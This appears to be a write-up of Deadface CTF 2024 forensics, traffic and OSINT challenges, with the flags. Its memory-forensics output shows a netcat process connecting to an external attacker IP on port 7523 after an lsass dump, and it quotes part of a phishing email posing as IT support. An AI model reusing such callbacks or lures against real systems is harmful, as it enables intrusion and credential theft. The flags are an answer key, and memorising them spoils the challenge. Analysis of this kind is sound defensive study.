Deadface CTF 2024
Deadface CTF 2024 Writeup
Forensic challenges
Big Fish
PCAP analysis:
Wireshark > Export Object > HTTP// Some code
Netcat is downloaded after the POST request to notice.html
flag{45.55.201.188}Password
PCAP Analysis:
flag{S4rt0RIS19&&}Suscpicious Sender
Content of frame 13010:
please follow the on-screen instructions to update the agent and ensure your system is compliant with company standards.</p>
<p>If you encounter any issues or require assistance, feel free to contact our IT support team.</p>
<p>Thank you for your attention to this matter.</p>
<p>Sincerely,</p>
<p><strong>William Hadderly</strong><br>IT Support Manager<br>Techno Global Research Industries</p>
</div>
<div class="email-footer">
<p>© 2024 Techno Global Research Industries. All rights reserved.</p>
</div>
</div>
</div>
</body>
</htmlflag{William Hadderly}Traffic Analysis
Wild Wild West
PCAP analysis
Export SMB objects - Deadface.txt
flag{kerbrute_finding_users}Phantom Operation
Right Time
Memory forensic:
$ volatility3 -f physmem.raw windows.info
<-SNIP->
SystemTime 2024-10-06 23:38:00flag{2024-10-06 23:38:00+00:00}Bad Processes
Flag = PID of the malicious process executed by the victim
$ volatility3 -f physmem.raw windows.pslist
11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11540 11532 conhost.exe 0xe7878387f080 3 - 1 False 2024-10-06 23:26:52.000000 N/A Disabled
11332 628 svchost.exe 0xe7878178b080 10 - 0 False 2024-10-06 23:30:50.000000 N/A Disabled
12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A Disabled
11828 628 svchost.exe 0xe7877f9da080 4 - 0 False 2024-10-06 23:37:08.000000 N/A Disabled1sass.exe and 945f.exe
volatility3 -f physmem.raw windows.pstree
<-SNIP->
*** 8460 4108 winupdate.exe 0xe78781c2a080 2 - 1 False 2024-10-06 23:26:47.000000 N/A \Device\HarddiskVolume2\Users\garry\Downloads\update\winupdate.exe "C:\Users\garry\Downloads\update\winupdate.exe" C:\Users\garry\Downloads\update\winupdate.exe
**** 11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\Temp\1sass.exe "C:\Windows\Temp\1sass.exe" C:\Windows\Temp\1sass.exe
***** 11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\SysWOW64\cmd.exe cmd C:\Windows\SysWOW64\cmd.exe
****** 12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A \Device\HarddiskVolume2\Users\garry\945f.exe .\945f.exe 45.55.201.188 7523 C:\Users\garry\945f.exe
<-SNIP->Netcat use port 7523 after a lsass dump lunched by winupdate.exe PID 8460
flag{8460}System Information
The attacker obtained the victim's system information; identify the file where this information was stored.
$ volatility3 -f physmem.raw windows.filescan
<-SNIP->
0xe78782eabca0 \Windows\Temp\sysinfo.txt 216
<-SNIP->flag{C:\Windows\Temp\sysinfo.txt}OSINT
Dog's name:
Golden Cross of the Order of the Redeemer:
“On April 5, 2022, Chairman and CEO of Pfizer Albert Bourla was honored with Greece's top civilian award for his efforts in developing a life-saving COVID-19 vaccine. Greek President Katerina Sakellaropoulou presented Dr. Bourla with the Golden Cross of the Order of the Redeemer,”
Thesis publication year:
“Bourla's doctoral thesis (1991) is titled "Effect of melatonin implants on”
flag{charlie*1991$Simba+04-05-2022}Last updated